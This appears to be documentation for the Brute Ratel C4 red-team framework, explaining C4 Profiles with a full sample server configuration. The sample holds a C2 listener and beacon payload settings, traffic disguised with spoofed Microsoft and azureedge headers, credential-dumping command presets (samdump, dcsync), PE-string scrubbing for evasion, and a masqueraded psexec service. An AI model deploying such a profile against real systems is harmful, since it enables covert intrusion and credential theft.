C4 Profilers

After creating a server using the -ratel option from the command line, you can select the settings icon above the scratchpad to view the full server configuration.

Once you create a listener using Brute Commander, you can view the configuration as shown above and save the server configuration locally as a ‘.conf’ file. These configuration files are called C4 Profiles. Profilers can be used to quickly set up listeners, automate command execution, queue commands for badgers, create server users, add custom commands to badgers, configure payloads, and more. The Ratel server accepts a configuration file via the ‘-c’ option.

Below is a sample C4 profile configuration. Note that the sample contains a trailing comma after the last entry of the "credentials" array, which strict JSON parsers reject.

{
    "admin_list": {
        "admin": "admin"
    },
    "auto_save": false,
    "autoruns": [
        "set_child werfault.exe",
        "sleep 2"
    ],
    "c2_handler": "0.0.0.0:8443",
    "click_script": {
        "Credential Dumping": [
            "samdump",
            "shadowclone",
            "dcsync"
        ],
        "Discovery": [
            "id",
            "pwd",
            "ipstats",
            "psreflect echo $psversiontable",
            "net users",
            "scquery"
        ]
    },
    "comm_enc_key": "pass@123",
    "credentials": [
        {
            "creddomain": "bruteratel.corp",
            "crednote": "Domain Admin Password",
            "credpass": "admin@123",
            "creduser": "administrator"
        },
        {
            "creddomain": "jupiter.solar.corp",
            "crednote": "Domain Admin Password",
            "credpass": "jupiter@123",
            "creduser": "administrator"
        },
    ],
    "register_dll": {
        "boxreflect": {
            "file_path": "server_confs/boxreflect.dll",
            "description": "Loads a test reflective dll message box",
            "artifact": "WINAPI",
            "mainArgs": "NA",
            "optionalArg": "NA",
            "example": "boxcheck",
            "minimumArgCount": 1,
            "replace_str": {
                "boxit": "\\x00\\x00\\x00\\x00\\x00",
                "!This program cannot ": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00",
                "be run in DOS mode.": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
            }
        }
    },
    "register_pe": {
        "seatbelt": {
            "file_path": "server_confs/Seatbelt.exe",
            "description": "Runs Seatbelt C# executable",
            "artifact": "WINAPI",
            "mainArgs": "NA",
            "optionalArg": "NA",
            "example": "seatbelt",
            "minimumArgCount": 1
        },
        "monologue": {
            "file_path": "server_confs/InternalMonologue.exe",
            "description": "Runs InternalMonologue C# executable",
            "artifact": "WINAPI",
            "mainArgs": "NA",
            "optionalArg": "NA",
            "example": "monologue",
            "minimumArgCount": 1
        }
    },
    "register_obj": {
        "o_getprivs": {
            "file_path": "server_confs/getprivs.o",
            "description": "Get privilege of current user",
            "artifact": "WINAPI",
            "mainArgs": "NA",
            "optionalArg": "NA",
            "example": "o_getprivs",
            "minimumArgCount": 1
        }
    },
    "listeners": {
        "Primary-Https": {
            "auth_count": 1,
            "auth_type": false,
            "c2_authkeys": [
                "abcd@123"
            ],
            "c2_uri": [
                "content.php",
                "admin.php",
                "login.php",
                "content.js",
                "api"
            ],
            "extra_headers": {
                "Cache-Control": " no-cache",
                "Cookie": " AUTH-1babbba6265ca2eba78b65bda5e34545c32a95b2",
                "Host": "test.azureedge.net",
                "Pragma": " no-cache",
                "Referer": " https://mail.microsoft.com",
                "x-pm-apiversion": " 3",
                "x-pm-appversion": " Web_3.16.33",
                "x-pm-uid": " d0e1f5b0dc08202064de25a"
            },
            "host": "192.168.0.142",
            "is_random": false,
            "os_type": "windows",
            "port": "443",
            "rotational_host": "192.168.0.142",
            "ssl": true,
            "useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
        }
    },
    "payload_config": {
        "auto-Primary-Https": {
            "c2_auth": "abcd@123",
            "c2_uri": [
                "content.php",
                "admin.php",
                "login.php",
                "content.js",
                "api"
            ],
            "extra_headers": {
                "Cache-Control": " no-cache",
                "Cookie": " AUTH-1babbba6265ca2eba78b65bda5e34545c32a95b2",
                "Host": "test.azureedge.net",
                "Pragma": " no-cache",
                "Referer": " https://mail.microsoft.com",
                "x-pm-apiversion": " 3",
                "x-pm-appversion": " Web_3.16.33",
                "x-pm-uid": " d0e1f5b0dc08202064de25a"
            },
            "host": "192.168.0.142",
            "port": "443",
            "ssl": true,
            "type": "HTTP",
            "useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
        },
        "main_smb": {
            "c2_auth": "abcd@123",
            "smb_pipe": "\\\\.\\pipe\\mynamedpipe",
            "type": "SMB"
        },
        "main_tcp": {
            "c2_auth": "abcd@123",
            "host": "127.0.0.1",
            "port": "10000",
            "type": "TCP"
        }
    },
    "psexec_config": {
        "psexec_svc_desc": "Manages universal application core process that in Windows 8 and continues in Windows 10. It is used to determine whether universal apps installed from the Windows Store are declaring all of their permissions, like being able to access your telemetry, location or microphone. It helps to transact records of your universal apps with the trust and privacy settings of user.",
        "psexec_svc_name": "TransactionBrokerService"
    },
    "ssl_cert": "cert.pem",
    "ssl_key": "key.pem",
    "user_list": {
        "brute": "password123",
        "ratel": "password123"
    },
    "users": {
        "active": {
            "admin": "06-01-2021 12:51:49"
        },
        "inactive": {}
    }
}